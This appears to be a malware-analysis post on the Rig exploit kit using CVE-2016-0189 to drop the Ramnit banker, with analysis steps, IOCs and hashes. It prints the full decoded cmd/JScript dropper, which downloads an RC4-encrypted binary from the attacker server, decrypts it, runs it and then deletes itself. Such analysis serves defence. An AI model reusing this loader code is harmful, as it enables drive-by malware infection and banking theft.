Source: Seamless gate leading to RigEK and Ramnit banker.
Tools: Fiddler, Internet Explorer, Firefox Web-Developer plugin
The observed URI parameters are from thee RigEK URI 81.177[.140.137 (AS8342 RTCOMM-AS, RU):
- NjA0MjE0/NDg3NDE4
- mano
- pano
- gift
- work
While investigating the Rig EK observed its served exploit CVE-2016-0189 (VBScript Memory Corruption) based on the user-agent string “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).” Previously, the same exploit kit was serving the Rig EK CVE-2015-8651 Adobe Flash exploit based on the same user-agent string.
Steps:
(1) Obtain the RigEK response from Fiddler.
(2) Debug the payload in Web-Developer plugin by setting up the breakpoint on bx or return and copying the decoded payload.
(3) Observe the full decoded VBS code from RigEK’s CVE-2016-0189 function, which is almost an exact copy of the Github CVE-2016-0189 page (minus a few variable changes and change ShellExecute to Run functions for obfuscation purposes). In this matter, CVE-2016-0186 is also known as “Scripting Engine Memory Corruption Vulnerability.”
(4) Finally, observe the Ramnit banker drop from the RigEK leveraging the exploit.
The CVE-2016-0189 exploit allows remote code execution and transfers control to the following decoded beatified cmd command that downloads an encoded binary, decrypts, and runs the Ramnit banker as follows:
| cmd.exe / q / c cd / d “%tmp%” && echo
function O(l) {
var w = “pow”,
j = 4 * 9;
return A.round((A[w](j, l + 1) – A.random() * A[w](j, l))).toString(j)[“slice”](1)
};
function V(k) {
var y = a(e + “.” + e + “Request.5.1”);
y.setProxy(n);
y.open(“GET”, k(1), 1);
y.Option(n) = k(2);
y.send();
y.WaitForResponse();
if (200 == y.status) return _(y.responseText, k(n))
};
function _(k, e) {
for (var l = 0, n, c = [], F = 5 + 5 * 50, S = String, q = [], b = 0; 256 ^ > b; b++) c[b] = b;
for (b = 0; 256 ^ > b; b++) l = l + c[b] + e.charCodeAt(b % e.length) ^ & F, n = c[b], c[b] = c[l], c[l] = n;
for (var p = l = b = 0; p ^ < k.length; p++) b = b + 1 ^ & F, l = l + c[b] ^ & F, n = c[b], c[b] = c[l], c[l] = n, q.push(S.fromCharCode(k.charCodeAt(p) ^ ^ c[c[b] + c[l] ^ & F]));
return q.join(“”)
};
try {
u = WScript, o = “Object”, A = Math, a = Function(“b”, “retu” + “rn u.Create” + o + “(b)”);
P = (“” + u).split(” “)[1], M = “indexOf”, q = a(P + “ing.FileSystem” + o), m = u.Arguments, e = “WinHTTP”, Z = “cmd”, U = “DEleTefIle”, j = a(“W” + P + “.Shell”), s = a(“ADODB.Stream”), x = O(8) + “.”, p = “exe”, n = 0, K = u[P + “FullName”], E = “.” + p;
s.Type = 3 – 1;
s.Charset = “iso-8859-1”;
s.Open();
try {
v = V(m)
} catch
 { v = V(m)
};
d = v.charCodeAt(20 + 1 + v[M](“PE\x00\x00”));
s.WriteText(v);
h = “dll”;
if (31 ^ < d) {
var z = 1;
x += h
} else x += p;
s.savetofile(x, 2);
s.Close();
C = ” /c “;
Y = “gsvr32”;
z ^ & ^ & (x = “re” + Y + E + ” /s ” + x);
j.run(Z + E + C + x, 0)
} catch (N) {};
q[U](K); > o32.tmp && start wscript //B //E:JScript o32.tmp “wexykukusw” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)” “http://81.177.140%5B.%5D137/?NDg3NDE4&mano=%5BREDACTED%5D&pano=%5BREDACTED%5D&work=MzY0MzM0NjY=”
|
The shortened relevant function is as follows (commented):
Indicators of Compromise (IOCs):
08-15-2017 – RigEK server 81.177.140[.]137 (AS8342 RTCOMM-AS, RU)
08-15-2017 – RigEK exploit CVE-2016-0189 landing
SHA-1: 7993998d5f50bb7a3f8575fdfdb93f3386dbacde
Link
08-15-2017 – Ramnit Banker
SHA-1: 667d40d8c7c10f027ac57e91c509ddd56b8bc736
Reverse Engineering, Malware Deep Insight 